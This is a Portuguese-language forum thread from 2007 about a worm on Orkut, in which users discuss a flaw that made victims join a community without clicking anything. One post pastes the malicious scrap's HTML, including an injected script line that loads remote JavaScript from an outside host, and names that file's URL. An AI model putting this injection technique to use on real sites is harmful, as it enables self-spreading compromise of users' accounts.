Mais umaaa falha no orkut...

Started by Ch1p5, 19 de December , 2007, 02:19:39 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Ch1p5

Falha no Orkut permite que a vítima seja infectada sem clicar em nenhum link malicioso.
Trata-se de um JS inserido em flash que faz a vítima entrar em uma comunidade sem seu conhecimento (ou fazer coisas bem piores...).
A falha foi explorada por RodLac hoje e já pegou mais de 300.000 usuários.

Comunidade:
http://www.orkut.com/Community.aspx?cmm=44001818

[Noticia bem mal-feita :P é que fui eu quem fiz^^]


"Minha impressora está normal, mas não imprime"

Ch1p5

Putz! to dormindo^^
Esqueci alguns detalhes

Recado com o virus:
2008 vem ai... que ele comece mto bem para vc
RL Wed Dec 19 2007 02:03:22 GMT-0200 (Hora oficial do Brasil)

Codigo-fonte no scrapbook:
  <div class="para" >
  2008 vem ai... que ele comece mto bem para vc<br><font color="#C6C6C6">RL Wed Dec 19 2007 02:03:22 GMT-0200 (Hora oficial do Brasil)</font><br><div id="flashDiv33423118"><b>Para visualizar este conteúdo, atualize para a versão mais recente de plug-in Flash em <a href="http://www.macromedia.com/go/getflashplayer/" target="_blank">http://www.macromedia.com/go/getflashplayer</a>.</b></div><script type="text/javascript"> var flashWriter = new _SWFObject('http://www.orkut.com/LoL.aspx', '33423118', '1', '1', '9', '#FFFFFF', 'autohigh', '', '', '33423118'); flashWriter._addParam('wmode', 'transparent'); script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';document.getElementsByTagName('head')[0].appendChild(script);escape(''); flashWriter._addParam('allowNetworking', 'internal'); flashWriter._addParam('allowScriptAccess', 'never'); flashWriter._setAttribute('style', ''); flashWriter._write('flashDiv33423118');</script>
  <div class="lf">
  </div>


JS: 'http://files.myopera.com/virusdoorkut/files/virus.js'

Excuse me for double post


"Minha impressora está normal, mas não imprime"

nizep

Em um dos topicos da comu falam que o bug ja foi corrigido

criaram ate uma comunidade
"eu tava no virus do orkut"  :P
http://www.orkut.com/Community.aspx?cmm=7246810&refresh=1

mais uma falha sussa do orkut

huahauahuahaua